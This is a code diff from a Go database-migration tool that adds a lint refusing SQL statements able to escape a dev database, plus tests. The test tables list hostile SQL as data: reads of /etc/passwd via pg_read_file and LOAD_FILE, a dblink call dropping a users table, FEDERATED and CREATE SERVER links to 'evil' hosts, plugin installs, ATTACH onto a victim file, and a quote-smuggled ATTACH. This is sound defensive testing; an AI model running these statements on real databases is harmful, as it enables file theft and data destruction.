 		{
@@ -33,6 +34,66 @@ func TestCheckPlanStatementsSandboxableRefusesEscapes(t *testing.T) {
 			name:      "sqlite_vacuum_into",
 			statement: `VACUUM INTO '/tmp/copy.db'`,
 			construct: "VACUUM INTO",
+		},
+		{
+			name:      "sqlite_pragma_temp_store_directory",
+			statement: `PRAGMA temp_store_directory = '/tmp/evil'`,
+			construct: "PRAGMA temp_store_directory",
+		},
+		{
+			name:      "postgres_do_block_calling_dblink",
+			statement: "DO $$ BEGIN PERFORM dblink_exec('dbname=target', 'DROP TABLE users'); END $$",
+			construct: "DO",
+		},
+		{
+			name:      "postgres_function_body_reading_files",
+			statement: "CREATE FUNCTION pwn() RETURNS text AS $$ BEGIN RETURN pg_read_file('/etc/passwd'); END $$ LANGUAGE plpgsql",
+			construct: "pg_read_file",
+		},
+		{
+			name:      "postgres_function_body_in_plain_string",
+			statement: `CREATE FUNCTION pwn() RETURNS text AS 'SELECT pg_read_file(''/etc/passwd'')' LANGUAGE sql`,
+			construct: "pg_read_file",
+		},
+		{
+			name:      "postgres_function_body_with_tagged_dollar_quote",
+			statement: "CREATE OR REPLACE FUNCTION pwn() RETURNS void AS $body$ BEGIN PERFORM dblink('dbname=target', 'SELECT 1'); END $body$ LANGUAGE plpgsql",
+			construct: "dblink",
+		},
+		{
+			name:      "mysql_federated_engine",
+			statement: "CREATE TABLE remote_users (id integer) ENGINE=FEDERATED CONNECTION='mysql://user@evil/db/users'",
+			construct: "ENGINE=FEDERATED",
+		},
+		{
+			name:      "mysql_create_server",
+			statement: `CREATE SERVER evil FOREIGN DATA WRAPPER mysql OPTIONS (HOST 'evil.example', DATABASE 'x')`,
+			construct: "CREATE SERVER",
+		},
+		{
+			name:      "mysql_load_file_function",
+			statement: `INSERT INTO t (blob_col) VALUES (LOAD_FILE('/etc/passwd'))`,
+			construct: "LOAD_FILE",
+		},
+		{
+			name:      "mysql_install_plugin",
+			statement: `INSTALL PLUGIN evil SONAME 'evil.so'`,
+			construct: "INSTALL PLUGIN",
+		},
+		{
+			name:      "mysql_install_component",
+			statement: `INSTALL COMPONENT 'file://component_evil'`,
+			construct: "INSTALL COMPONENT",
+		},
+		{
+			name:      "mysql_data_directory",
+			statement: `CREATE TABLE t (id integer) DATA DIRECTORY = '/var/evil'`,
+			construct: "DATA DIRECTORY",
+		},
+		{
+			name:      "mysql_index_directory",
+			statement: `CREATE TABLE t (id integer) INDEX DIRECTORY = '/var/evil'`,
+			construct: "INDEX DIRECTORY",
 		},
 		{
 			name:      "mysql_load_data_local_infile",
@@ -85,6 +146,11 @@ func TestCheckPlanStatementsSandboxableRefusesEscapes(t *testing.T) {
 			construct: "pg_read_file",
 		},
 		{
+			name:      "postgres_qualified_pg_read_file",
+			statement: `SELECT pg_catalog.pg_read_file('/etc/passwd')`,
+			construct: "pg_read_file",
+		},
+		{
 			name:      "postgres_lo_export",
 			statement: `SELECT lo_export(loid, '/tmp/out.bin') FROM t`,
 			construct: "lo_export",
@@ -98,7 +164,7 @@ func TestCheckPlanStatementsSandboxableRefusesEscapes(t *testing.T) {
 			err := atlasschema.CheckPlanStatementsSandboxable([]string{
 				`CREATE TABLE ok (id integer)`,
 				tt.statement,
-			})
+			}, tt.dialect)
 
 			// The refusal names the offending statement position and the
 			// construct, and it must be recognizable as an escape refusal.
@@ -106,7 +172,7 @@ func TestCheckPlanStatementsSandboxableRefusesEscapes(t *testing.T) {
 			c.Assert(atlasschema.IsPlanEscape(err), qt.IsTrue)
 			c.Assert(err, qt.ErrorMatches,
 				`pre-planned migration cannot be verified on a dev database: statement 2 uses `+tt.construct+`, which .*`)
-			c.Assert(err, qt.ErrorMatches, `(?s).*Replaying it would not be a sandboxed rehearsal.*`)
+			c.Assert(err, qt.ErrorMatches, `(?s).*Replaying it would not stay inside the dev database.*`)
 		})
 	}
 }
@@ -115,6 +181,7 @@ func TestCheckPlanStatementsSandboxableAllowsOrdinaryDDL(t *testing.T) {
 	tests := []struct {
 		name      string
 		statement string
+		dialect   string
 	}{
 		{
 			name:      "table_named_attachment",
@@ -131,6 +198,61 @@ func TestCheckPlanStatementsSandboxableAllowsOrdinaryDDL(t *testing.T) {
 		{
 			name:      "quoted_column_named_infile",
 			statement: `ALTER TABLE reports ADD COLUMN "infile" text`,
+		},
+		{
+			// Bare, unquoted names that merely collide with the keywords:
+			// INTO OUTFILE is the escape, the word alone is not.
+			name:      "bare_column_named_outfile",
+			statement: `ALTER TABLE reports ADD COLUMN outfile text`,
+		},
+		{
+			name:      "bare_column_named_dumpfile",
+			statement: `ALTER TABLE reports ADD COLUMN dumpfile text`,
+		},
+		{
+			name:      "bare_column_named_infile",
+			statement: `ALTER TABLE reports ADD COLUMN infile text`,
+		},
+		{
+			// The table name is followed by `(`, which is a DDL name
+			// position, not a dblink call site.
+			name:      "table_named_dblink_events",
+			statement: `CREATE TABLE dblink_events (id integer NOT NULL PRIMARY KEY, note text)`,
+		},
+		{
+			name:      "table_named_dblink_events_if_not_exists",
+			statement: `CREATE TABLE IF NOT EXISTS dblink_events (id integer)`,
+		},
+		{
+			name:      "insert_into_table_named_dblink_events",
+			statement: `INSERT INTO dblink_events (id) VALUES (1)`,
+		},
+		{
+			name:      "column_named_dblink_url",
+			statement: `ALTER TABLE services ADD COLUMN dblink_url text`,
+		},
+		{
+			name:      "index_named_lo_import",
+			statement: `CREATE INDEX lo_import ON objects (name)`,
+		},
+		{
+			name:      "index_named_pg_read_file",
+			statement: `CREATE INDEX pg_read_file ON objects (name)`,
+		},
+		{
+			name:      "bracket_quoted_outfile_column",
+			statement: `ALTER TABLE reports ADD COLUMN [outfile] nvarchar(100)`,
+			dialect:   "sqlserver",
+		},
+		{
+			name:      "bracket_quoted_dblink_table",
+			statement: `CREATE TABLE [dblink] (id int)`,
+			dialect:   "sqlserver",
+		},
+		{
+			name:      "bracket_quoted_identifier_containing_semicolon_and_attach",
+			statement: `CREATE TABLE [a;ATTACH] (id int)`,
+			dialect:   "sqlserver",
 		},
 		{
 			name:      "string_literal_containing_attach",
@@ -157,8 +279,20 @@ func TestCheckPlanStatementsSandboxableAllowsOrdinaryDDL(t *testing.T) {
 			statement: `CREATE TABLE jobs (program text NOT NULL)`,
 		},
 		{
+			name:      "column_named_directory",
+			statement: `CREATE TABLE data (directory text NOT NULL)`,
+		},
+		{
 			name:      "vacuum_without_into",
 			statement: `VACUUM`,
+		},
+		{
+			name:      "pragma_foreign_keys",
+			statement: `PRAGMA foreign_keys = ON`,
+		},
+		{
+			name:      "plain_function_without_escapes",
+			statement: "CREATE FUNCTION bump() RETURNS integer AS $$ BEGIN RETURN 1; END $$ LANGUAGE plpgsql",
 		},
 	}
 
@@ -166,7 +300,9 @@ func TestCheckPlanStatementsSandboxableAllowsOrdinaryDDL(t *testing.T) {
 		t.Run(tt.name, func(t *testing.T) {
 			c := qt.New(t)
 
-			c.Assert(atlasschema.CheckPlanStatementsSandboxable([]string{tt.statement}), qt.IsNil)
+			err := atlasschema.CheckPlanStatementsSandboxable([]string{tt.statement}, tt.dialect)
+
+			c.Assert(err, qt.IsNil)
 		})
 	}
 }
@@ -180,7 +316,20 @@ func TestCheckPlanStatementsSandboxableScansBothStringEscapeDialects(t *testing.
 	// smuggle an escape past the guard.
 	statement := `INSERT INTO t VALUES ('\'); ATTACH DATABASE '/tmp/x.db' AS y; --')`
 
-	err := atlasschema.CheckPlanStatementsSandboxable([]string{statement})
+	err := atlasschema.CheckPlanStatementsSandboxable([]string{statement}, "mysql")
+
+	c.Assert(atlasschema.IsPlanEscape(err), qt.IsTrue, qt.Commentf("err=%v", err))
+}
+
+func TestCheckPlanStatementsSandboxableScansNestedRoutineBodies(t *testing.T) {
+	c := qt.New(t)
+
+	// A routine body that builds another routine still gets scanned.
+	statement := "CREATE FUNCTION outer_fn() RETURNS void AS $outer$ BEGIN " +
+		"EXECUTE 'CREATE FUNCTION inner_fn() RETURNS text AS $inner$ BEGIN RETURN pg_read_file(''/etc/passwd''); END $inner$ LANGUAGE plpgsql'; " +
+		"END $outer$ LANGUAGE plpgsql"
+
+	err := atlasschema.CheckPlanStatementsSandboxable([]string{statement}, "postgres")
 
 	c.Assert(atlasschema.IsPlanEscape(err), qt.IsTrue, qt.Commentf("err=%v", err))
 }
@@ -188,6 +337,6 @@ func TestCheckPlanStatementsSandboxableScansBothStringEscapeDialects(t *testing.
 func TestCheckPlanStatementsSandboxableAcceptsEmptyInput(t *testing.T) {
 	c := qt.New(t)
 
-	c.Assert(atlasschema.CheckPlanStatementsSandboxable(nil), qt.IsNil)
-	c.Assert(atlasschema.CheckPlanStatementsSandboxable([]string{"", "   "}), qt.IsNil)
+	c.Assert(atlasschema.CheckPlanStatementsSandboxable(nil, "sqlite"), qt.IsNil)
+	c.Assert(atlasschema.CheckPlanStatementsSandboxable([]string{"", "   "}, "sqlite"), qt.IsNil)
 }

--- a/internal/atlasschema/planguard_wiring_internal_test.go
+++ b/internal/atlasschema/planguard_wiring_internal_test.go
@@ -1,0 +1,158 @@
+package atlasschema
+
+// White-box testing required: these tests pin the WIRING between the escape
+// lint and the engine-level restrictions, which is only observable from inside
+// the package. They neutralize the unexported lint seam so the remaining
+// refusal can only come from the database engine, and they drive the
+// unexported rehearsal core directly so the assertion covers every caller of
+// it rather than one command path.
+
+import (
+	"context"
+	"database/sql"
+	"fmt"
+	"os"
+	"path/filepath"
+	"testing"
+
+	qt "github.com/frankban/quicktest"
+
+	"github.com/stokaro/ptah/core/goschema"
+	"github.com/stokaro/ptah/dbschema"
+	"github.com/stokaro/ptah/migration/migrator"
+)
+
+// goschemaDatabaseFixture is a non-nil desired state; these tests never reach
+// the comparison that would read it.
+var goschemaDatabaseFixture = goschema.Database{}
+
+// withoutPlanLint neutralizes the escape lint for one test, so anything that
+// still refuses a statement is doing so for real.
+func withoutPlanLint(c *qt.C) {
+	c.Helper()
+	original := checkPlanStatements
+	checkPlanStatements = func([]string, string) error { return nil }
+	c.Cleanup(func() { checkPlanStatements = original })
+}
+
+func connectSQLiteForWiring(c *qt.C, dbPath string) *dbschema.DatabaseConnection {
+	c.Helper()
+	conn, err := dbschema.ConnectToDatabase(context.Background(), "sqlite://"+dbPath)
+	c.Assert(err, qt.IsNil)
+	c.Cleanup(func() { dbschema.CloseAndWarn(conn) })
+	return conn
+}
+
+func victimHasTable(c *qt.C, victimPath, table string) bool {
+	c.Helper()
+	db, err := sql.Open("sqlite", victimPath)
+	c.Assert(err, qt.IsNil)
+	defer db.Close()
+	var count int
+	c.Assert(db.QueryRow(
+		`SELECT count(*) FROM sqlite_master WHERE type = 'table' AND name = ?`, table,
+	).Scan(&count), qt.IsNil)
+	return count > 0
+}
+
+// TestRehearsalCoreRefusesEscapeWithoutTheLint is the test that says the
+// containment is real. With the lint neutralized, the original ATTACH payload
+// goes through the shared rehearsal core untouched, and the only thing left to
+// stop it is the engine restriction the core's session carries. It fails if
+// the restriction is dropped, applied to the wrong connection, or never
+// verified.
+func TestRehearsalCoreRefusesEscapeWithoutTheLint(t *testing.T) {
+	c := qt.New(t)
+	withoutPlanLint(c)
+	dir := t.TempDir()
+	devPath := filepath.Join(dir, "dev.db")
+	victimPath := filepath.Join(dir, "victim.db")
+
+	victim, err := sql.Open("sqlite", victimPath)
+	c.Assert(err, qt.IsNil)
+	_, err = victim.Exec(`CREATE TABLE untouched (id INTEGER PRIMARY KEY)`)
+	c.Assert(err, qt.IsNil)
+	c.Assert(victim.Close(), qt.IsNil)
+
+	devConn := connectSQLiteForWiring(c, devPath)
+	statements := []string{
+		fmt.Sprintf("ATTACH DATABASE '%s' AS victim", victimPath),
+		"CREATE TABLE victim.pwned (id integer)",
+	}
+
+	err = rehearseStatementsOnDev(context.Background(), devConn, nil, migrator.MigrationTxModeNone, statements)
+
+	// The refusal comes from SQLite, not from Ptah's scanner.
+	c.Assert(err, qt.IsNotNil)
+	c.Assert(IsPlanEscape(err), qt.IsFalse, qt.Commentf("the lint is disabled; this refusal must come from the engine"))
+	c.Assert(err.Error(), qt.Contains, "too many attached databases")
+	c.Assert(victimHasTable(c, victimPath, "pwned"), qt.IsFalse)
+	c.Assert(victimHasTable(c, victimPath, "untouched"), qt.IsTrue)
+}
+
+// TestRehearsalCoreRefusesEscapeWithoutTheLintUnderEveryTxMode covers the
+// transaction modes separately: the restriction must hold whether or not the
+// statements run inside a transaction.
+func TestRehearsalCoreRefusesEscapeWithoutTheLintUnderEveryTxMode(t *testing.T) {
+	tests := []struct {
+		name   string
+		txMode migrator.MigrationTxMode
+	}{
+		{name: "none", txMode: migrator.MigrationTxModeNone},
+		{name: "file", txMode: migrator.MigrationTxModeFile},
+		{name: "all", txMode: migrator.MigrationTxModeAll},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			c := qt.New(t)
+			withoutPlanLint(c)
+			dir := t.TempDir()
+			victimPath := filepath.Join(dir, "victim.db")
+			devConn := connectSQLiteForWiring(c, filepath.Join(dir, "dev.db"))
+
+			err := rehearseStatementsOnDev(context.Background(), devConn, nil, tt.txMode,
+				[]string{fmt.Sprintf("ATTACH DATABASE '%s' AS victim", victimPath)})
+
+			c.Assert(err, qt.IsNotNil)
+			c.Assert(err.Error(), qt.Contains, "too many attached databases")
+			_, statErr := os.Stat(victimPath)
+			c.Assert(os.IsNotExist(statErr), qt.IsTrue, qt.Commentf("ATTACH must not have created the database file"))
+		})
+	}
+}
+
+// TestRehearsalCoreLintsStatementsTheEngineWouldAccept pins the lint call site
+// inside the shared core, which is what gates the apply-path simulation as
+// well as plan files. It uses a construct the SQLite engine happily executes
+// but the lint refuses, so only the lint can produce this outcome.
+func TestRehearsalCoreLintsStatementsTheEngineWouldAccept(t *testing.T) {
+	c := qt.New(t)
+	dir := t.TempDir()
+	devConn := connectSQLiteForWiring(c, filepath.Join(dir, "dev.db"))
+
+	err := rehearseStatementsOnDev(context.Background(), devConn, nil, migrator.MigrationTxModeNone,
+		[]string{`PRAGMA temp_store_directory = '/tmp/evil'`})
+
+	c.Assert(IsPlanEscape(err), qt.IsTrue, qt.Commentf("err=%v", err))
+	c.Assert(err, qt.ErrorMatches, `.*statement 1 uses PRAGMA temp_store_directory.*`)
+}
+
+// TestRehearsePlanStatementsLintsBeforeTouchingTheTarget pins the second lint
+// call site: the plan path refuses before it reads the target database. The
+// target connection here is already closed, so reaching introspection at all
+// would surface a database error instead of the escape refusal.
+func TestRehearsePlanStatementsLintsBeforeTouchingTheTarget(t *testing.T) {
+	c := qt.New(t)
+	dir := t.TempDir()
+	targetPath := filepath.Join(dir, "target.db")
+	target, err := dbschema.ConnectToDatabase(context.Background(), "sqlite://"+targetPath)
+	c.Assert(err, qt.IsNil)
+	c.Assert(target.Close(), qt.IsNil)
+
+	err = RehearsePlanStatements(context.Background(), target,
+		[]string{`PRAGMA temp_store_directory = '/tmp/evil'`},
+		&goschemaDatabaseFixture, PlanRehearsalOptions{DevURL: "sqlite://" + filepath.Join(dir, "dev.db")})
+
+	c.Assert(IsPlanEscape(err), qt.IsTrue, qt.Commentf("err=%v", err))
+}

--- a/internal/atlasschema/planguard_wiring_internal_test.go
+++ b/internal/atlasschema/planguard_wiring_internal_test.go
@@ -124,15 +124,16 @@ func TestRehearsalCoreRefusesEscapeWithoutTheLintUnderEveryTxMode(t *testing.T) 
 
 // TestRehearsalCoreLintsStatementsTheEngineWouldAccept pins the lint call site
 // inside the shared core, which is what gates the apply-path simulation as
-// well as plan files. It uses a construct the SQLite engine happily executes
-// but the lint refuses, so only the lint can produce this outcome.
+// well as plan files. It uses a construct the SQLite engine accepts — the
+// pragma points at a directory that exists, which the engine requires — but
+// the lint refuses, so only the lint can produce this outcome.
 func TestRehearsalCoreLintsStatementsTheEngineWouldAccept(t *testing.T) {
 	c := qt.New(t)
 	dir := t.TempDir()
 	devConn := connectSQLiteForWiring(c, filepath.Join(dir, "dev.db"))
 
 	err := rehearseStatementsOnDev(context.Background(), devConn, nil, migrator.MigrationTxModeNone,
-		[]string{`PRAGMA temp_store_directory = '/tmp/evil'`})
+		[]string{fmt.Sprintf("PRAGMA temp_store_directory = '%s'", dir)})
 
 	c.Assert(IsPlanEscape(err), qt.IsTrue, qt.Commentf("err=%v", err))
 	c.Assert(err, qt.ErrorMatches, `.*statement 1 uses PRAGMA temp_store_directory.*`)

--- a/internal/atlasschema/planverify.go
+++ b/internal/atlasschema/planverify.go
@@ -30,10 +30,15 @@ type PlanDesiredStateError struct {
 func (e *PlanDesiredStateError) Error() string {
 	drift := strings.TrimSpace(FormatMigrationSQL(e.Drift))
 	if e.Phase == "rehearsal" {
+		// The claim is deliberately narrow: the plan was not applied to the
+		// target by this command. Statements that could reach outside the dev
+		// database are refused before the replay (see PlanEscapeError), but
+		// this message does not promise anything about what a replayed
+		// statement did elsewhere.
 		return fmt.Sprintf(
 			"pre-planned migration does not converge to the desired state: replaying the plan on the dev database, "+
 				"starting from the target's current schema, left the following schema drift against --to "+
-				"(the target database was left unchanged):\n%s\n"+
+				"(the plan was not applied to the target):\n%s\n"+
 				"either the target database changed since the plan was computed or the plan was computed for a "+
 				"different desired state; re-run `schema plan` against the current database and review the fresh plan",
 			drift)
@@ -91,6 +96,12 @@ func RehearsePlanStatements(
 	if devURL == "" {
 		return errors.New("plan rehearsal requires a dev database URL")
 	}
+	// The dev database is only a sandbox for statements that cannot reach out
+	// of it. This gate runs before anything is executed anywhere, including
+	// before the target is inspected.
+	if err := CheckPlanStatementsSandboxable(statements); err != nil {
+		return err
+	}
 
 	current, err := dbschema.ReadSchemaWithSchemas(conn, nil)
 	if err != nil {
@@ -146,7 +157,10 @@ func VerifyAppliedPlanState(
 		Exclude: exclude,
 	})
 	if err != nil {
-		return fmt.Errorf("verify applied plan end state: %w", err)
+		// The plan already executed successfully; this is the verification
+		// itself failing to run, which must not read as a schema mismatch.
+		return fmt.Errorf(
+			"the plan was applied successfully, but the end-state verification could not be completed: %w", err)
 	}
 	if len(computation.statements) > 0 {
 		return &PlanDesiredStateError{Phase: "post-apply", Drift: computation.statements}

--- a/internal/atlasschema/planverify.go
+++ b/internal/atlasschema/planverify.go
@@ -1,0 +1,167 @@
+package atlasschema
+
+import (
+	"context"
+	"errors"
+	"fmt"
+	"os"
+	"path/filepath"
+	"strings"
+
+	"github.com/stokaro/ptah/core/goschema"
+	"github.com/stokaro/ptah/dbschema"
+	"github.com/stokaro/ptah/internal/atlasfilter"
+	"github.com/stokaro/ptah/migration/migrator"
+)
+
+// PlanDesiredStateError reports that the plan's SQL does not converge the
+// database to the --to desired state. Phase "rehearsal" means the mismatch
+// was caught on the dev database before the target was touched; phase
+// "post-apply" means the plan executed on the target but the resulting schema
+// does not match the desired state.
+type PlanDesiredStateError struct {
+	// Phase is "rehearsal" or "post-apply".
+	Phase string
+	// Drift is Ptah's own DDL describing the remaining differences between
+	// the reached state and the desired state.
+	Drift []string
+}
+
+func (e *PlanDesiredStateError) Error() string {
+	drift := strings.TrimSpace(FormatMigrationSQL(e.Drift))
+	if e.Phase == "rehearsal" {
+		return fmt.Sprintf(
+			"pre-planned migration does not converge to the desired state: replaying the plan on the dev database, "+
+				"starting from the target's current schema, left the following schema drift against --to "+
+				"(the target database was left unchanged):\n%s\n"+
+				"either the target database changed since the plan was computed or the plan was computed for a "+
+				"different desired state; re-run `schema plan` against the current database and review the fresh plan",
+			drift)
+	}
+	return fmt.Sprintf(
+		"schema apply --plan end-state verification failed: after applying the plan, the database does not match "+
+			"the --to desired state; the remaining schema drift is:\n%s",
+		drift)
+}
+
+// IsPlanDesiredStateFailure reports whether err wraps a desired-state
+// verification failure.
+func IsPlanDesiredStateFailure(err error) bool {
+	var target *PlanDesiredStateError
+	return errors.As(err, &target)
+}
+
+// PlanRehearsalOptions configures RehearsePlanStatements.
+type PlanRehearsalOptions struct {
+	// DevURL is the dev database the plan is replayed on. Required; the dev
+	// database is reset destructively.
+	DevURL string
+	// TargetURL guards against pointing the rehearsal at the target itself.
+	TargetURL string
+	// DesiredURLs are the raw --to values, guarded like TargetURL.
+	DesiredURLs []string
+	// Exclude filters the introspected current schema and both sides of the
+	// end-state comparison with the plan's recorded exclude patterns.
+	Exclude []string
+	// TxMode is the transaction mode the target apply will use.
+	TxMode migrator.MigrationTxMode
+}
+
+// RehearsePlanStatements verifies a pre-planned migration semantically, the
+// way Atlas verifies a plan file whose hashes it can check and Ptah cannot:
+// the dev database is reset, the target's introspected current schema is
+// recreated on it, the plan's ordered statements execute there, and the
+// reached state must equal the --to desired state under Ptah's own schema
+// diff. A replay failure or a non-empty diff refuses the target apply; the
+// target database has not been modified.
+func RehearsePlanStatements(
+	ctx context.Context,
+	conn *dbschema.DatabaseConnection,
+	statements []string,
+	desired *goschema.Database,
+	opts PlanRehearsalOptions,
+) error {
+	if conn == nil {
+		return errors.New("plan rehearsal requires database connection")
+	}
+	if desired == nil {
+		return errors.New("plan rehearsal requires the desired schema state")
+	}
+	devURL := strings.TrimSpace(opts.DevURL)
+	if devURL == "" {
+		return errors.New("plan rehearsal requires a dev database URL")
+	}
+
+	current, err := dbschema.ReadSchemaWithSchemas(conn, nil)
+	if err != nil {
+		return fmt.Errorf("read database schema: %w", err)
+	}
+	current, err = atlasfilter.ExcludeDatabase(current, opts.Exclude)
+	if err != nil {
+		return fmt.Errorf("apply plan exclude patterns to current schema: %w", err)
+	}
+
+	devConn, err := connectSimulationDev(ctx, devURL, conn.Info(), opts.TargetURL, opts.DesiredURLs)
+	if err != nil {
+		return err
+	}
+	defer dbschema.CloseAndWarn(devConn)
+
+	if err := rehearseStatementsOnDev(ctx, devConn, current, opts.TxMode, statements); err != nil {
+		return err
+	}
+
+	computation, err := computeApplyPlan(ctx, devConn, ApplyOptions{
+		Desired: desired,
+		Exclude: opts.Exclude,
+	})
+	if err != nil {
+		return fmt.Errorf("compare rehearsed plan state with the desired state: %w", err)
+	}
+	if len(computation.statements) > 0 {
+		return &PlanDesiredStateError{Phase: "rehearsal", Drift: computation.statements}
+	}
+	return nil
+}
+
+// VerifyAppliedPlanState performs the post-apply end-state verification:
+// after the plan executed on the target, the introspected database schema
+// must match the --to desired state under Ptah's own schema diff. Atlas
+// performs the equivalent verification on every `schema apply --plan`; the
+// check is always on and has no opt-out flag.
+func VerifyAppliedPlanState(
+	ctx context.Context,
+	conn *dbschema.DatabaseConnection,
+	desired *goschema.Database,
+	exclude []string,
+) error {
+	if conn == nil {
+		return errors.New("plan end-state verification requires database connection")
+	}
+	if desired == nil {
+		return errors.New("plan end-state verification requires the desired schema state")
+	}
+	computation, err := computeApplyPlan(ctx, conn, ApplyOptions{
+		Desired: desired,
+		Exclude: exclude,
+	})
+	if err != nil {
+		return fmt.Errorf("verify applied plan end state: %w", err)
+	}
+	if len(computation.statements) > 0 {
+		return &PlanDesiredStateError{Phase: "post-apply", Drift: computation.statements}
+	}
+	return nil
+}
+
+// NewEphemeralSQLiteDev creates a throwaway SQLite dev database for plan
+// rehearsal when no --dev-url was given: a SQLite dev database is just a
+// temporary file, so the rehearsal needs no operator-provided server. The
+// returned cleanup removes the database; it is safe to call once.
+func NewEphemeralSQLiteDev() (devURL string, cleanup func(), err error) {
+	dir, err := os.MkdirTemp("", "ptah-plan-dev-*")
+	if err != nil {
+		return "", nil, fmt.Errorf("create ephemeral dev database directory: %w", err)
+	}
+	return "sqlite://" + filepath.Join(dir, "dev.db"), func() { _ = os.RemoveAll(dir) }, nil
+}

--- a/internal/atlasschema/planverify.go
+++ b/internal/atlasschema/planverify.go
@@ -96,10 +96,11 @@ func RehearsePlanStatements(
 	if devURL == "" {
 		return errors.New("plan rehearsal requires a dev database URL")
 	}
-	// The dev database is only a sandbox for statements that cannot reach out
-	// of it. This gate runs before anything is executed anywhere, including
-	// before the target is inspected.
-	if err := CheckPlanStatementsSandboxable(statements); err != nil {
+	// Known escape constructs are refused before anything is executed
+	// anywhere, including before the target is inspected. This is a
+	// best-effort deny-list rather than a sandbox: see CheckPlanStatements-
+	// Sandboxable for what a dev database is still exposed to.
+	if err := CheckPlanStatementsSandboxable(statements, conn.Info().Dialect); err != nil {
 		return err
 	}
 

--- a/internal/atlasschema/planverify.go
+++ b/internal/atlasschema/planverify.go
@@ -96,10 +96,10 @@ func RehearsePlanStatements(
 	if devURL == "" {
 		return errors.New("plan rehearsal requires a dev database URL")
 	}
-	// Known escape constructs are refused before anything is executed
-	// anywhere, including before the target is inspected. This is a
-	// best-effort deny-list rather than a sandbox: see CheckPlanStatements-
-	// Sandboxable for what a dev database is still exposed to.
+	// The escape lint runs again inside rehearseStatementsOnDev, which is the
+	// gate every dev-database caller passes through. Running it here too
+	// refuses a plan before the target database is even inspected, and lets
+	// the refusal name the target dialect rather than the dev one.
 	if err := CheckPlanStatementsSandboxable(statements, conn.Info().Dialect); err != nil {
 		return err
 	}

--- a/internal/atlasschema/simulate.go
+++ b/internal/atlasschema/simulate.go
@@ -13,6 +13,7 @@ import (
 	dbschematypes "github.com/stokaro/ptah/dbschema/types"
 	"github.com/stokaro/ptah/internal/atlasurl"
 	"github.com/stokaro/ptah/internal/convert/dbschematogo"
+	"github.com/stokaro/ptah/migration/migrator"
 	"github.com/stokaro/ptah/migration/planner"
 	"github.com/stokaro/ptah/migration/schemadiff"
 )
@@ -87,44 +88,76 @@ func (p ApplyRuntimePlan) SimulateOnDev(ctx context.Context, opts SimulateOption
 		return errors.New("schema apply simulation requires database connection")
 	}
 
-	targetInfo := p.conn.Info()
-	if err := atlasurl.ValidateDialectMatch(devURL, targetInfo.Dialect); err != nil {
+	devConn, err := connectSimulationDev(ctx, devURL, p.conn.Info(), opts.TargetURL, opts.DesiredURLs)
+	if err != nil {
 		return err
 	}
+	defer dbschema.CloseAndWarn(devConn)
+
+	return rehearseStatementsOnDev(ctx, devConn, p.current, p.txMode, statements)
+}
+
+// connectSimulationDev validates the dev database URL against the target and
+// opens the dev connection used to rehearse a plan. The caller owns closing
+// the returned connection.
+func connectSimulationDev(
+	ctx context.Context,
+	devURL string,
+	targetInfo dbschematypes.DBInfo,
+	targetURL string,
+	desiredURLs []string,
+) (*dbschema.DatabaseConnection, error) {
+	if err := atlasurl.ValidateDialectMatch(devURL, targetInfo.Dialect); err != nil {
+		return nil, err
+	}
 	if isDockerSimulationURL(devURL) {
-		return errors.New("docker --dev-url values are accepted by Atlas, but Ptah requires a directly connectable dev database URL for schema apply simulation")
+		return nil, errors.New("docker --dev-url values are accepted by Atlas, but Ptah requires a directly connectable dev database URL for schema apply simulation")
 	}
-	if devURL == strings.TrimSpace(opts.TargetURL) {
-		return errors.New("--dev-url must not point at the target database: the dev database is reset destructively before the plan is rehearsed on it")
+	if devURL == strings.TrimSpace(targetURL) {
+		return nil, errors.New("--dev-url must not point at the target database: the dev database is reset destructively before the plan is rehearsed on it")
 	}
-	for _, desired := range opts.DesiredURLs {
+	for _, desired := range desiredURLs {
 		if devURL == strings.TrimSpace(desired) {
-			return fmt.Errorf("--dev-url must not point at the --to desired-state database %q: the dev database is reset destructively before the plan is rehearsed on it", desired)
+			return nil, fmt.Errorf("--dev-url must not point at the --to desired-state database %q: the dev database is reset destructively before the plan is rehearsed on it", desired)
 		}
 	}
 
 	devConn, err := dbschema.ConnectToDatabase(ctx, devURL)
 	if err != nil {
-		return fmt.Errorf("connect to --dev-url: %w", err)
+		return nil, fmt.Errorf("connect to --dev-url: %w", err)
 	}
-	defer dbschema.CloseAndWarn(devConn)
 
 	devInfo := devConn.Info()
 	if platform.NormalizeDialect(devInfo.Dialect) != platform.NormalizeDialect(targetInfo.Dialect) {
-		return fmt.Errorf("--dev-url dialect %q does not match --url dialect %q", devInfo.Dialect, targetInfo.Dialect)
+		dbschema.CloseAndWarn(devConn)
+		return nil, fmt.Errorf("--dev-url dialect %q does not match --url dialect %q", devInfo.Dialect, targetInfo.Dialect)
 	}
 	if err := checkSimulationSchemaScope(devInfo, targetInfo); err != nil {
-		return err
+		dbschema.CloseAndWarn(devConn)
+		return nil, err
 	}
+	return devConn, nil
+}
 
+// rehearseStatementsOnDev resets the dev database, recreates the target's
+// introspected current schema on it, and executes the ordered statements
+// under txMode — the shared rehearsal core of the pre-apply simulation and
+// the plan-file desired-state verification.
+func rehearseStatementsOnDev(
+	ctx context.Context,
+	devConn *dbschema.DatabaseConnection,
+	current *dbschematypes.DBSchema,
+	txMode migrator.MigrationTxMode,
+	statements []string,
+) error {
 	devConn.SchemaWriter().SetDryRun(false)
 	if err := devConn.SchemaWriter().DropAllTables(ctx); err != nil {
 		return &SimulationError{Stage: "reset", Err: err}
 	}
-	if err := recreateCurrentSchema(ctx, devConn, p.current); err != nil {
+	if err := recreateCurrentSchema(ctx, devConn, current); err != nil {
 		return &SimulationError{Stage: "baseline", Err: err}
 	}
-	if err := applyStatements(ctx, devConn, p.txMode, statements); err != nil {
+	if err := applyStatements(ctx, devConn, txMode, statements); err != nil {
 		return &SimulationError{Stage: "plan", Err: err}
 	}
 	return nil

--- a/internal/atlasschema/simulate.go
+++ b/internal/atlasschema/simulate.go
@@ -157,22 +157,23 @@ func rehearseStatementsOnDev(
 	txMode migrator.MigrationTxMode,
 	statements []string,
 ) error {
-	if err := CheckPlanStatementsSandboxable(statements, devConn.Info().Dialect); err != nil {
+	if err := checkPlanStatements(statements, devConn.Info().Dialect); err != nil {
 		return err
 	}
-	// A SQLite dev database gets real engine-level restrictions for the whole
-	// rehearsal, which is what actually contains the ephemeral dev database
-	// Ptah creates itself. The lint above is only a lint.
-	if platform.NormalizeDialect(devConn.Info().Dialect) == platform.SQLite {
-		return devConn.WithSession(ctx, func(session *dbschema.DatabaseConnection) error {
-			if err := session.RestrictSQLiteSession(ctx); err != nil {
-				return fmt.Errorf("restrict dev database session: %w", err)
-			}
